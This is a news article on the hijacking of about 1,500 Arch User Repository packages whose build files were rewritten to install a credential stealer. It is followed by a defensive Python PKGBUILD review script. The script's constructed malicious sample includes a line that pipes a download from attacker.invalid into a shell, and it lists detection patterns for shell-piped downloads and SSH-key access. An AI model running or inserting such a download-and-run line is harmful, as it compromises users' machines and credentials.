One of the largest open-source package repositories just spent a weekend cleaning up after a malware campaign that did not break into anything. It did not need to.
Attackers seized control of more than 1,500 packages in the Arch User Repository, or AUR, the community-run software collection that sits alongside Arch Linux’s official repositories, and quietly rewrote their build instructions to install a credential stealer on any machine that compiled them. By Monday, the project had taken the unusual step of freezing new account registration while it cleaned up.
The number kept moving. It started at around 400 packages, climbed past 1,500 over the weekend, and one tracking list named 1,579, which Arch itself described as “many, but not all” of those hit. Crucially, Arch’s core distribution and its official repos were never affected.
An attack on trust, not a flaw
What makes this notable is how little hacking was involved. The AUR is user-submitted and explicitly unsupported: Arch tells people to read a package’s build file before installing it, every time. There is no vetting, by design.
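That advice, read the build file before every install, is easier to follow when a tool surfaces what changed since the last review. Below is an added example (not code from the article or from Arch) that compares a freshly fetched PKGBUILD against the copy a user approved earlier and flags new download sources, skipped checksums and lines that pipe a download into a shell; both PKGBUILD texts, the attacker.invalid host and the list of risky patterns are constructed assumptions for the demonstration.

```python
import re
# Constructed sample: the PKGBUILD as it looked when the user last reviewed it.
OLD_PKGBUILD = """\
pkgver=1.2.0
source=("https://example.org/example-tool-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
package() {
  make -C "$srcdir/example-tool-$pkgver" DESTDIR="$pkgdir" install
}
"""

# Constructed sample: the rewritten PKGBUILD, with an unchecked extra source and a download-and-run line.
NEW_PKGBUILD = """\
pkgver=1.2.0
source=("https://example.org/example-tool-$pkgver.tar.gz"
        "https://attacker.invalid/setup.sh")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000'
            'SKIP')
package() {
  make -C "$srcdir/example-tool-$pkgver" DESTDIR="$pkgdir" install
  curl -s https://attacker.invalid/s.sh | sh
}
"""

RISKY_LINES = [  # assumed patterns a build step or install hook rarely needs legitimately
    (r"(curl|wget)[^|\n]*\|\s*(ba)?sh\b", "pipes a download straight into a shell"),
    (r"base64\s+(-d|--decode)", "decodes an embedded blob"),
    (r"~/\.(ssh|bashrc|profile)|\$HOME/\.(ssh|bashrc|profile)", "touches SSH keys or shell startup files"),
]
def bash_array(text, name):
    """Items of a bash array assignment such as source=(...), quotes stripped."""
    m = re.search(rf"^{name}=\((.*?)\)", text, re.S | re.M)
    return [item.strip("'\"") for item in m.group(1).split()] if m else []

def review_pkgbuild(old, new):
    """Return findings about changes between two PKGBUILD texts that deserve a close read."""
    findings = []
    old_sources = bash_array(old, "source")
    for url in bash_array(new, "source"):
        if url not in old_sources:
            findings.append(f"new source entry: {url}")
    if "SKIP" in bash_array(new, "sha256sums"):
        findings.append("a checksum is SKIP, so that download is not integrity-checked")
    old_lines = set(old.splitlines())
    for line in (l for l in new.splitlines() if l not in old_lines):
        for pattern, why in RISKY_LINES:
            if re.search(pattern, line):
                findings.append(f"{why}: {line.strip()}")
    return findings
```

An empty result does not mean the package is safe; it only means nothing obvious changed, and the file still has to be read.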